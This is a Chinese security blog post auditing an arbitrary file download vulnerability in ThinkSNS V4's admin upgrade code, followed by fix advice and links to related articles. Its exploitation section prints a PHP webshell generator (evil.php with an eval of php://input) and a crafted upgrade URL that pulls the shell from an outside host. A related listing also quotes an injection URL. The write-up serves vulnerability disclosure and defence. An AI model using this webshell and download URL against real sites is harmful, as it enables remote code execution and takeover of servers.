【代码审计】ThinkSNS_V4 任意文件下载漏洞分析

最新推荐文章于 2023-03-17 15:15:00 发布
最新推荐文章于 2023-03-17 15:15:00 发布
阅读量717 收藏
点赞数
分类专栏: 【PHP 代码审计】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/84967380
版权

 

0x00 环境准备

ThinkSNS官网:http://www.thinksns.com

网站源码版本:ThinkSNS V4  更新时间:2017-09-13

程序源码下载:http://www.thinksns.com/experience.html(填写信息后,提交并下载代码)

默认后台:http://127.0.0.1/index.php?app=admin&mod=Public&act=login

默认用户:管理员帐号: admin@admin.com密码自设,大于6位

测试网站首页:

 

0x01 代码分析

1、        漏洞文件位置:

/apps/admin/Lib/Action/UpgradeAction.class.php 第168-189行:

 

在这段函数中,先备份老配置文件,然后下载增量包,下载参数$downUrl未经过任何处理,直接下载到网站目录下,接着验证hash判断包是否合法,但是并没有删除下载的增量包,导致程序在实现上存在任意文件下载漏洞,下载远程文件到网站目录下,攻击者可指定第三方url下载恶意脚本到网站目录,进一步触发恶意代码,控制网站服务器。

0x02 漏洞利用

1、第三方网站,新建一个evil.php,作为第三方源文件

  1. <?php   
  2. echo "<?php ";  
  3. echo "eval(file_get_contents('php://input'));";  
  4. echo "?>";  
  5. ?>  

2、        登录后台,通过访问构造的url,成功下载第三方源的恶意脚本文件。

http://127.0.0.1/index.php?app=admin&mod=Upgrade&act=step1&upurl=http://192.168.8.154/evil.php

 

3、        通过直接访问url,触发代码执行,成功获取网站服务器权限。

 

0x03 修复建议

1、        指定固定更新源,避免参数被用户可控;

2、        经过hash验证的包如果不合法,应立即删除。

 

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

 

Bypass--
关注
专栏目录
thinksns v4 开源代码及文档
05-02
thinksns v4 开源代码及文档 包含 开源版本代码、技术文档、使用手册及pc端及服务端修复文档
[漏洞]ThinkSNS严重漏洞--将全站崩溃
数据库天地
09-14 189
author: selfimpr blog: http://blog.csdn.net/lgg201 mail: lgg860911@yahoo.com.cn 漏洞描述: 未对需要暴露在web环境下的脚本做目录结构上的规划, 访问特定脚本, 导致全站依赖的缓存系统崩溃, 全站崩溃. 实现方式: 由于造成后果太严重, 实现步骤不细说, 有兴趣的朋友可以根据描述研究. 造成后果请自己负责....
ThinkSnS v4后台任意文件下载漏洞
weixin_30600503的博客
06-24 508
漏洞文件:/apps/admin/Lib/Action/UpgradeAction.class.php 主要问题还是出现在了180行直接将远程获取到的图片直接保存。 文中可见并没有做任何的对$downUrl进行过滤,$path也是。 所以就顺利的通过file_get_contents远程获取到了文件,然后通过file_put_contents写入到了$path当中。所以你远...
thinksns开源微博系统 V3上传漏洞
收集盒 Book box
04-20 943
发布时间:2013-04-08  关键词:thinksns 微博 上传漏洞 ThinkSNS是基于互联网web2.0思想开发的老牌开源微博SNS系统,其开发始于2008年,其间经历了从 1.0→1.6→2.0→2.3→2.5→2.8→V3多个大版本的迭代,目前最新版本为V3。 thinksns v3 漏洞产生文件 attachaction.class.php: pu
minify php,ThinkSNS public/minify.php 任意文件包含漏洞
weixin_39912580的博客
03-12 334
## 漏洞信息:ThinkSNS开源微博系统,是智士的开源社交平台。采用PHP+MySQL技术平台,微博+应用的产品模式,同时拥有iphone、android客户端、wap、3G版界面。ThinkSNS public/minify.php 存在任意文件包含漏洞,可被利用导致敏感信息泄漏。## 漏洞分析:问题在public/minify.php:```allowed_content_types=ar...
ThinkSNS_V4 后台任意文件下载导致Getshell.pdf
最新发布
04-22
### ThinkSNS_V4 后台任意文件下载导致Getshell.pdf #### 一、前言与背景 ThinkSNS是一款全面覆盖多种平台的社交系统,适用于国内外大小企业及创业者的社会化软件开发和技术解决方案。该系统提供了两个主要版本:...
【实战篇】第19篇:ThinkSNS_V4 后台任意文件下载导致Getshell1
08-03
这篇文章是关于ThinkSNS V4版本的一个安全漏洞的实战分析,该漏洞允许攻击者通过任意文件下载来实现Getshell,即获取服务器的控制权。ThinkSNS是一款流行的社交网络平台,用于为企业和个人提供社交软件解决方案。在...
ThinkSNS_v4.6.1_开源版本_含全部技术资料
02-12
《ThinkSNS_v4.6.1开源版本:深度解析与技术探讨》 ThinkSNS是一款功能强大的社交网络系统,其v4.6.1开源版本的发布,为开发者提供了全面的技术支持和丰富的资源,包括开源代码、技术文档、使用手册以及针对PC端和...
thinksns.zip_thinksns_thinksns+源码_thinksns源码
09-20
3. **源码分析**:下载的“thinksns.zip”文件包含了ThinkSNS的完整源代码,开发者可以深入了解系统的工作原理,对代码进行修改、调试或二次开发。源码中通常包括了前端界面、后端逻辑、数据库模型、API接口以及配置...
ThinkSNS_V2.8_allinone
06-08
《ThinkSNS_V2.8_allinone:全方位解析社交网络平台的构建与优化》 在信息化社会中,社交网络已经成为人们日常生活、工作中不可或缺的一部分。ThinkSNS是一款强大的社交网络软件,它为开发者和企业提供了一个高效、...
Bypass_1.14.2.zip
06-05
Bypass_1.14.2.zip
Thinksns微博系统注入漏洞即后台拿webshell
收集盒 Book box
09-20 1836
Exp: http://www.site.com/index.php?app=blog&mod=Index&act=show&id=1101 注入点注入字段 表ts_user `uid` int(11) NOT NULL AUTO_INCREMENT, `email` varchar(255) DEFAULT NULL, `password` varchar(255
thinksns V3(开源微博系统) getshell 漏洞附利用方法
收集盒 Book box
05-16 1363
wooyun test的重测试是这程序 结果我申请没让我进 听朋友说是这个 我就大概看了下 就发现个getshell 反正众测那么多黑客 肯定到时候有人挖出来 还不如放出来 attachaction.class.php   public function capture(){ error_reporting(0);
thinksns2.0 登陆漏洞
iteye_19283的博客
03-19 189
1、源代码:[code="java"] /** * 使用cookie登陆 * * @param string $cookieId * @return boolean */ public function cookieLoginLocal($cookieId){ $cookieId = explode( '.', base64_decode($cookieI...
$ac $f php 代码审计,代码审计之ThinkSNS v4.6.0最新版前台getshell
weixin_39637260的博客
03-31 198
前言对于一个后台的至getshell的漏洞点,若需要当作前台来利用,最直接的idea会想到什么?当然是XSS、CSRF了,这已经不是什么新鲜话题或trick了,较早的wordpress 前台XSS之Getshell、最近安全客也有人发过zzzphp1.6前台的Getshell方式使用类似的方法。所以笔者对ThinkSNS审计的后台漏洞分析及其利用同样结合CSRF进行。漏洞类型通用漏洞简介后台升级存...
渗透thinksns官网
Coisini的博客
06-16 474
(本文涉及的所有漏洞已经被修复!) (由于文章是后来补写的,有些图可能无法抓到。sorry) ThinkSNS(简称TS),开源微博引擎。 一直都在看thinksns的代码,但是由于很彩笔,一直没找到什么实质的漏洞, 某天在90sec上,看到某黑阔发的thinksns注入0day,看了下,是一个插件的注入,注入点:index.php?app=blog& mod=Index&act...
文件包含漏洞与文件包含Bypass漏洞基础
bluemoon_0的博客
03-17 466
文件包含漏洞与文件包含Bypass漏洞基础
漏洞与BUG
撸蛇的博客
08-02 2713
  最近浏览“混世魔王”的博客,看到他撰写的一篇博客《当你发现程序有一个漏洞,你和程序员沟通,程序员认为这只是一个BUG。根本不算漏洞,你会怎么处理这个问题?》,有所感触,便转载博文部分内容以作记录,如有侵权等相关问题,可以联系我,同时说明,最近对web攻防方面十分感兴趣,偶然机会浏览到“混世魔王”的博客,十分欣赏作者。 当你发现程序有一个漏洞,你和程序员沟通,程序员认为这只是一个BUG。根本...
代码审计】EasySNS_V1.6 前台任意文件下载漏洞分析
12-03 362
&#13;  &#13; 0x00 环境准备&#13; EasySNS官网:http://www.imzaker.com/&#13; 网站源码版本:EasySNS极简社区V1.60&#13; 程序源码下载:http://es.imzaker.com/index.php/Topic/gview/id/92.html&#13; 默认后台地址:http://127.0.0.1/ad...
Thinksns常用函数手册:安全与代码加亮
"thinksns常用函数手册,包括各种实用函数,如获取客户端IP、字符串截取、随机字串生成、验证码生成、字节格式化、UTF8编码检测、代码高亮、HTML过滤与安全文本处理等。" 在Thinksns框架中,这些函数扮演着重要的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bypass--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值